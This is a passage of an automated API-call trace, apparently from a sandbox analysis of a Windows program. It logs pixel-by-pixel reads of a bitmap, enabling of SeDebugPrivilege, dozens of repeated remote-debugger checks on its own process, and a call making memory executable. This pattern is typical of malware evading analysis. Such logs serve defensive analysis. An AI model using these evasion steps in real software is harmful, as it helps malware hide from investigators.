(image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.483] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=205, color=0x33e1d0) returned 0x0 [0168.483] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.483] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.483] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=206, color=0x33e1d0) returned 0x0 [0168.483] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.483] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.483] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=207, color=0x33e1d0) returned 0x0 [0168.483] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.483] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.483] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=208, color=0x33e1d0) returned 0x0 [0168.483] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.483] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.483] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=209, color=0x33e1d0) returned 0x0 [0168.483] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.484] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.484] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=210, color=0x33e1d0) returned 0x0 [0168.484] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.484] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.484] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=211, color=0x33e1d0) returned 0x0 [0168.484] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.484] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.484] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=212, color=0x33e1d0) returned 0x0 [0168.484] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.484] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.484] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=213, color=0x33e1d0) returned 0x0 [0168.484] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.484] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.484] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=214, color=0x33e1d0) returned 0x0 [0168.484] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.484] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.484] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=215, color=0x33e1d0) returned 0x0 [0168.484] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.484] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.484] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=216, color=0x33e1d0) returned 0x0 [0168.484] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.484] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.484] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=217, color=0x33e1d0) returned 0x0 [0168.484] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.484] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.484] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=218, color=0x33e1d0) returned 0x0 [0168.484] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.484] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.485] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=219, color=0x33e1d0) returned 0x0 [0168.485] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.485] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.485] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=220, color=0x33e1d0) returned 0x0 [0168.485] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.485] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.485] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=221, color=0x33e1d0) returned 0x0 [0168.485] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.485] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.485] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=222, color=0x33e1d0) returned 0x0 [0168.485] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.485] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.485] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=223, color=0x33e1d0) returned 0x0 [0168.485] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.485] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.485] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=224, color=0x33e1d0) returned 0x0 [0168.485] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.485] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.485] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=225, color=0x33e1d0) returned 0x0 [0168.485] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.485] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.485] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=226, color=0x33e1d0) returned 0x0 [0168.485] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.485] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.485] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=227, color=0x33e1d0) returned 0x0 [0168.485] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.485] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.485] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=228, color=0x33e1d0) returned 0x0 [0168.486] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.486] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.486] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=229, color=0x33e1d0) returned 0x0 [0168.486] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.486] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.486] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=230, color=0x33e1d0) returned 0x0 [0168.486] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.486] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.486] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=231, color=0x33e1d0) returned 0x0 [0168.486] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.486] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.486] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=232, color=0x33e1d0) returned 0x0 [0168.486] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.486] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.486] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=233, color=0x33e1d0) returned 0x0 [0168.486] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.486] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.486] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=234, color=0x33e1d0) returned 0x0 [0168.486] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.486] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.486] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=235, color=0x33e1d0) returned 0x0 [0168.486] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.486] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.486] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=236, color=0x33e1d0) returned 0x0 [0168.486] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.486] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.486] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=237, color=0x33e1d0) returned 0x0 [0168.486] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.487] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.487] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=238, color=0x33e1d0) returned 0x0 [0168.487] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.487] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.487] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=239, color=0x33e1d0) returned 0x0 [0168.487] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.487] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.487] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=240, color=0x33e1d0) returned 0x0 [0168.487] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.487] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.487] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=241, color=0x33e1d0) returned 0x0 [0168.487] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.487] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.487] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=242, color=0x33e1d0) returned 0x0 [0168.487] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.487] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.487] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=243, color=0x33e1d0) returned 0x0 [0168.487] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.487] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.487] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=244, color=0x33e1d0) returned 0x0 [0168.487] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.487] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.487] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=245, color=0x33e1d0) returned 0x0 [0168.487] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.487] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.487] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=246, color=0x33e1d0) returned 0x0 [0168.487] GdipGetImageWidth (image=0x548fcf0, width=0x33e1c0) returned 0x0 [0168.487] GdipGetImageHeight (image=0x548fcf0, height=0x33e1c0) returned 0x0 [0168.488] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=247, color=0x33e1d0) returned 0x0 [0168.488] GdipBitmapGetPixel (bitmap=0x548fcf0, x=0, y=248, color=0x33e1d0) returned 0x0 [0169.135] GetCurrentProcessId () returned 0x530 [0169.137] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x33cc1c | out: lpLuid=0x33cc1c*(LowPart=0x14, HighPart=0)) returned 1 [0169.138] GetCurrentProcess () returned 0xffffffff [0169.139] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x33cc18 | out: TokenHandle=0x33cc18*=0x2ac) returned 1 [0169.139] AdjustTokenPrivileges (in: TokenHandle=0x2ac, DisableAllPrivileges=0, NewState=0x28a39c8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0169.139] CloseHandle (hObject=0x2ac) returned 1 [0169.140] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2ac [0169.140] GetExitCodeProcess (in: hProcess=0x2ac, lpExitCode=0x28a3954 | out: lpExitCode=0x28a3954*=0x103) returned 1 [0169.149] CheckRemoteDebuggerPresent (in: hProcess=0x2ac, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.149] GetCurrentProcessId () returned 0x530 [0169.149] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x274 [0169.149] GetExitCodeProcess (in: hProcess=0x274, lpExitCode=0x28a3a68 | out: lpExitCode=0x28a3a68*=0x103) returned 1 [0169.149] CheckRemoteDebuggerPresent (in: hProcess=0x274, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.150] GetCurrentProcessId () returned 0x530 [0169.150] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2c4 [0169.150] GetExitCodeProcess (in: hProcess=0x2c4, lpExitCode=0x28a3bb8 | out: lpExitCode=0x28a3bb8*=0x103) returned 1 [0169.150] CheckRemoteDebuggerPresent (in: hProcess=0x2c4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.150] GetCurrentProcessId () returned 0x530 [0169.150] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x268 [0169.150] GetExitCodeProcess (in: hProcess=0x268, lpExitCode=0x28a3c70 | out: lpExitCode=0x28a3c70*=0x103) returned 1 [0169.150] CheckRemoteDebuggerPresent (in: hProcess=0x268, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.150] GetCurrentProcessId () returned 0x530 [0169.150] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2b0 [0169.151] GetExitCodeProcess (in: hProcess=0x2b0, lpExitCode=0x28a3d28 | out: lpExitCode=0x28a3d28*=0x103) returned 1 [0169.151] CheckRemoteDebuggerPresent (in: hProcess=0x2b0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.151] GetCurrentProcessId () returned 0x530 [0169.151] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x278 [0169.151] GetExitCodeProcess (in: hProcess=0x278, lpExitCode=0x28a3de0 | out: lpExitCode=0x28a3de0*=0x103) returned 1 [0169.151] CheckRemoteDebuggerPresent (in: hProcess=0x278, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.151] GetCurrentProcessId () returned 0x530 [0169.151] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x27c [0169.151] GetExitCodeProcess (in: hProcess=0x27c, lpExitCode=0x28a3e98 | out: lpExitCode=0x28a3e98*=0x103) returned 1 [0169.152] CheckRemoteDebuggerPresent (in: hProcess=0x27c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.152] GetCurrentProcessId () returned 0x530 [0169.152] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2b4 [0169.152] GetExitCodeProcess (in: hProcess=0x2b4, lpExitCode=0x28a3f50 | out: lpExitCode=0x28a3f50*=0x103) returned 1 [0169.152] CheckRemoteDebuggerPresent (in: hProcess=0x2b4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.152] GetCurrentProcessId () returned 0x530 [0169.152] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x280 [0169.152] GetExitCodeProcess (in: hProcess=0x280, lpExitCode=0x28a4008 | out: lpExitCode=0x28a4008*=0x103) returned 1 [0169.152] CheckRemoteDebuggerPresent (in: hProcess=0x280, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.152] GetCurrentProcessId () returned 0x530 [0169.152] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x284 [0169.152] GetExitCodeProcess (in: hProcess=0x284, lpExitCode=0x28a40c0 | out: lpExitCode=0x28a40c0*=0x103) returned 1 [0169.153] CheckRemoteDebuggerPresent (in: hProcess=0x284, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.153] GetCurrentProcessId () returned 0x530 [0169.153] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2b8 [0169.153] GetExitCodeProcess (in: hProcess=0x2b8, lpExitCode=0x28a4178 | out: lpExitCode=0x28a4178*=0x103) returned 1 [0169.153] CheckRemoteDebuggerPresent (in: hProcess=0x2b8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.153] GetCurrentProcessId () returned 0x530 [0169.153] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2bc [0169.153] GetExitCodeProcess (in: hProcess=0x2bc, lpExitCode=0x28a4230 | out: lpExitCode=0x28a4230*=0x103) returned 1 [0169.153] CheckRemoteDebuggerPresent (in: hProcess=0x2bc, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.153] GetCurrentProcessId () returned 0x530 [0169.153] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x288 [0169.153] GetExitCodeProcess (in: hProcess=0x288, lpExitCode=0x28a42e8 | out: lpExitCode=0x28a42e8*=0x103) returned 1 [0169.153] CheckRemoteDebuggerPresent (in: hProcess=0x288, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.154] GetCurrentProcessId () returned 0x530 [0169.154] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2cc [0169.154] GetExitCodeProcess (in: hProcess=0x2cc, lpExitCode=0x28a43a0 | out: lpExitCode=0x28a43a0*=0x103) returned 1 [0169.154] CheckRemoteDebuggerPresent (in: hProcess=0x2cc, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.154] GetCurrentProcessId () returned 0x530 [0169.154] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x28c [0169.154] GetExitCodeProcess (in: hProcess=0x28c, lpExitCode=0x28a4458 | out: lpExitCode=0x28a4458*=0x103) returned 1 [0169.154] CheckRemoteDebuggerPresent (in: hProcess=0x28c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.154] GetCurrentProcessId () returned 0x530 [0169.154] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2c0 [0169.154] GetExitCodeProcess (in: hProcess=0x2c0, lpExitCode=0x28a4510 | out: lpExitCode=0x28a4510*=0x103) returned 1 [0169.154] CheckRemoteDebuggerPresent (in: hProcess=0x2c0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.154] GetCurrentProcessId () returned 0x530 [0169.154] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x290 [0169.155] GetExitCodeProcess (in: hProcess=0x290, lpExitCode=0x28a45c8 | out: lpExitCode=0x28a45c8*=0x103) returned 1 [0169.155] CheckRemoteDebuggerPresent (in: hProcess=0x290, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.155] GetCurrentProcessId () returned 0x530 [0169.155] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x294 [0169.155] GetExitCodeProcess (in: hProcess=0x294, lpExitCode=0x28a4680 | out: lpExitCode=0x28a4680*=0x103) returned 1 [0169.155] CheckRemoteDebuggerPresent (in: hProcess=0x294, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.164] VirtualProtect (in: lpAddress=0x1300400, dwSize=0x64400, flNewProtect=0x40, lpflOldProtect=0x33d500 | out: lpflOldProtect=0x33d500*=0x0) returned 0 [0169.174] GetCurrentProcessId () returned 0x530 [0169.174] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x298 [0169.174] GetExitCodeProcess (in: hProcess=0x298, lpExitCode=0x28a4738 | out: lpExitCode=0x28a4738*=0x103) returned 1 [0169.174] CheckRemoteDebuggerPresent (in: hProcess=0x298, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.174] GetCurrentProcessId () returned 0x530 [0169.174] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x29c [0169.174] GetExitCodeProcess (in: hProcess=0x29c, lpExitCode=0x28a47f0 | out: lpExitCode=0x28a47f0*=0x103) returned 1 [0169.174] CheckRemoteDebuggerPresent (in: hProcess=0x29c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.174] GetCurrentProcessId () returned 0x530 [0169.174] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2a0 [0169.175] GetExitCodeProcess (in: hProcess=0x2a0, lpExitCode=0x28a48a8 | out: lpExitCode=0x28a48a8*=0x103) returned 1 [0169.175] CheckRemoteDebuggerPresent (in: hProcess=0x2a0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.175] GetCurrentProcessId () returned 0x530 [0169.175] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2a4 [0169.175] GetExitCodeProcess (in: hProcess=0x2a4, lpExitCode=0x28a4960 | out: lpExitCode=0x28a4960*=0x103) returned 1 [0169.175] CheckRemoteDebuggerPresent (in: hProcess=0x2a4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.175] GetCurrentProcessId () returned 0x530 [0169.175] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x32c [0169.175] GetExitCodeProcess (in: hProcess=0x32c, lpExitCode=0x28a4a18 | out: lpExitCode=0x28a4a18*=0x103) returned 1 [0169.175] CheckRemoteDebuggerPresent (in: hProcess=0x32c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.175] GetCurrentProcessId () returned 0x530 [0169.175] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x328 [0169.175] GetExitCodeProcess (in: hProcess=0x328, lpExitCode=0x28a4ad0 | out: lpExitCode=0x28a4ad0*=0x103) returned 1 [0169.176] CheckRemoteDebuggerPresent (in: hProcess=0x328, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.176] GetCurrentProcessId () returned 0x530 [0169.176] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x334 [0169.176] GetExitCodeProcess (in: hProcess=0x334, lpExitCode=0x28a4b88 | out: lpExitCode=0x28a4b88*=0x103) returned 1 [0169.176] CheckRemoteDebuggerPresent (in: hProcess=0x334, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.176] GetCurrentProcessId () returned 0x530 [0169.176] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x338 [0169.176] GetExitCodeProcess (in: hProcess=0x338, lpExitCode=0x28a4c40 | out: lpExitCode=0x28a4c40*=0x103) returned 1 [0169.176] CheckRemoteDebuggerPresent (in: hProcess=0x338, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.176] GetCurrentProcessId () returned 0x530 [0169.176] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x33c [0169.176] GetExitCodeProcess (in: hProcess=0x33c, lpExitCode=0x28a4cf8 | out: lpExitCode=0x28a4cf8*=0x103) returned 1 [0169.176] CheckRemoteDebuggerPresent (in: hProcess=0x33c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.177] GetCurrentProcessId () returned 0x530 [0169.177] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x340 [0169.177] GetExitCodeProcess (in: hProcess=0x340, lpExitCode=0x28a4db0 | out: lpExitCode=0x28a4db0*=0x103) returned 1 [0169.177] CheckRemoteDebuggerPresent (in: hProcess=0x340, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.177] GetCurrentProcessId () returned 0x530 [0169.177] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x344 [0169.177] GetExitCodeProcess (in: hProcess=0x344, lpExitCode=0x28a4e68 | out: lpExitCode=0x28a4e68*=0x103) returned 1 [0169.177] CheckRemoteDebuggerPresent (in: hProcess=0x344, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.177] GetCurrentProcessId () returned 0x530 [0169.177] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x348 [0169.177] GetExitCodeProcess (in: hProcess=0x348, lpExitCode=0x28a4f20 | out: lpExitCode=0x28a4f20*=0x103) returned 1 [0169.177] CheckRemoteDebuggerPresent (in: hProcess=0x348, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.177] GetCurrentProcessId () returned 0x530 [0169.177] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x34c [0169.178] GetExitCodeProcess (in: hProcess=0x34c, lpExitCode=0x28a4fd8 | out: lpExitCode=0x28a4fd8*=0x103) returned 1 [0169.178] CheckRemoteDebuggerPresent (in: hProcess=0x34c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.178] GetCurrentProcessId () returned 0x530 [0169.178] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x350 [0169.178] GetExitCodeProcess (in: hProcess=0x350, lpExitCode=0x28a5090 | out: lpExitCode=0x28a5090*=0x103) returned 1 [0169.178] CheckRemoteDebuggerPresent (in: hProcess=0x350, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.178] GetCurrentProcessId () returned 0x530 [0169.178] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x354 [0169.178] GetExitCodeProcess (in: hProcess=0x354, lpExitCode=0x28a5148 | out: lpExitCode=0x28a5148*=0x103) returned 1 [0169.178] CheckRemoteDebuggerPresent (in: hProcess=0x354, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.178] GetCurrentProcessId () returned 0x530 [0169.178] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x358 [0169.178] GetExitCodeProcess (in: hProcess=0x358, lpExitCode=0x28a5200 | out: lpExitCode=0x28a5200*=0x103) returned 1 [0169.179] CheckRemoteDebuggerPresent (in: hProcess=0x358, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.179] GetCurrentProcessId () returned 0x530 [0169.179] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x35c [0169.179] GetExitCodeProcess (in: hProcess=0x35c, lpExitCode=0x28a52b8 | out: lpExitCode=0x28a52b8*=0x103) returned 1 [0169.179] CheckRemoteDebuggerPresent (in: hProcess=0x35c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.179] GetCurrentProcessId () returned 0x530 [0169.179] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x360 [0169.179] GetExitCodeProcess (in: hProcess=0x360, lpExitCode=0x28a5370 | out: lpExitCode=0x28a5370*=0x103) returned 1 [0169.179] CheckRemoteDebuggerPresent (in: hProcess=0x360, 